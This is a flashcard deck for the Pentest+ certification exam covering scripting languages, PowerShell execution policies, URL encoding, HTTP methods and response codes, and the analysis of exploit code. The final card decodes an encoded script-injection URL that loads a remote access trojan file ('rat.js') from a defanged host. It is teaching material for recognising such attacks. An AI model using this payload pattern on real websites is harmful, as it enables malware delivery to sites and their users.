Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

Pentest+ PTO-002 > Chapter 12: Scripting for Penetration Testing > Flashcards

Chapter 12: Scripting for Penetration Testing Flashcards

1
Q

Six Languages on Test

A
  • Bash
  • PowerShell
  • Ruby
  • Python
  • Perl
  • JavaScript
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

PowerShell Restrictions

A
  • Restricted: Default ps1 execution policy that blocks all use of scripts
  • AllSigned: Requires any ps1 script to be signed by a trusted publisher
  • RemoteSigned: Allows execution of any ps1 script that you write on the local machine, but requires scripts downloaded from internet to be signed by a trusted publisher
  • Unrestricted: Allows exeuciton of any ps1 script but prompts you to confirm before you run one from the internet
  • Bypass: Allows execution of any ps1 script with no warning for anything
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Percent Encoding

A
  • %00: null
  • %20: Space
  • %21: !
  • %22: “
  • %23: #
  • %24: $
  • %25: %
  • %26: &
  • %27: ‘
  • %28: (
  • %29: )
  • %2A: *
  • %2B: +
  • %2C: ,
  • %2D: -
  • %2E: .
  • %2F: /
  • %5C: \
  • %3F: ?
  • %3C: <
  • %3E: >
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Flow Controls

A
  • Conditional Statements: Diagram on page 459
  • For Loops: Diagram on page 464
  • While Loops: Diagram on page 470
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Analyzing Exploit Code

A

Enumeration
* Seeks to identify all the instances of a resource in an environment
* System enum identifies all the systems on a network
* User/Account enum identifies all the individuals with access to the environment
* Domain enum seeks to identify all valid subdomains for a parent domain

Downloading Files
* Commonly done to update malicious code, obtain instructions, or import new tools
* Pay attention to these downloads since the location and nature of files downloaded may provide clues to the identity and motivation of the attackers

Launching Remote Access
* One primary goal for attackers
* Once they run exploit code, they want to create remote access capabilities that allow them to control the system
* Provides important clues to the nature and purpose of an attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Automating Pentests

A

Scanning Systems
* Testers may create code that automatically performs port scans of an environment, processes the results, and then automatically triggers next steps based on the results
* EX: If port scan indicates that a web server accepts HTTPS on port 443, a follow up scan might enum the SSL/TLS ciphers supported by the server and produce a report for review

Configuration Analysis of Target Systems
* Automated code can probe the configuration of a target system and produce a report that helps ID next steps

Modifying of IP Addresses in Routine Activities
* Allows the rapid application of techniques to many different systems in an iterative fashion
* EX: Cycle through IPs in a for loop

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

HTTP Method

A

A set of request methods to indicate the desired action to be performed for a given resource

A request contains a method, a resource, a version number, the header, and the body of the request

GET
* The principal method used with HTTP and is used to retrieve a resource

POST
* Used to send data to the server for processing by the requested resource

PUT
* Creates or replaces the requested resource

DELETE
* Used to remove

HEAD
* Retrieve the headers for a resource only and igonres the body
* Often used by pentesters to banner grab information about the server and page, like the title of the page

NOTE
* Data submitted via a URL is delimited by the ? character

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

HTTP Response Codes

A
  • 200 = Successful GET or POST request
  • 201 = Successful PUT request to create a resource
  • 3xx = Redirect from the server
  • 4xx = Client request error
  • 400 = Request could not be parsed by server
  • 401 = Request did not supply auth creds
  • 403 = Request did not have sufficient permissions
  • 404 = Non-existent resource
  • 5xx = Server side error
  • 500 = General error on server side app
  • 502 = Bad gateway when server is acting as a proxy
  • 503 = Overload, service unavailability
  • 504 = Gateway timeout
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Example URL Analysis

A

hxxp://diontraining[.]com/upload.php?post=%3Cscript%3E%27http%3A%2F%2Fabc123.com%2Frat%2Ejs

hxxp://diontraining[.]com/upload.php?post=
* The website we’re going to
* The file on that website
* The action we’re going to do—POST
* Everything after the - is what we POST

%3Cscript%3E
* < script >

%2F%2Fabc123.com%2Frat%2Ejs
* ‘hxx://abc123[.]com/rat.js (defanged)

Putting It Together
* Go to diontraining dot com
* Access the file upload.php
* POST that file (upload)
* Send it to this website address
* Link to rat.js
* Trying to send a JS file to the site
* If it was vulnerable, malicious code is uploaded

How well did you know this?
1
Not at all
2
3
4
5
Perfectly

Pentest+ PTO-002 (13 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2024 Bold Learning Solutions. Terms and Conditions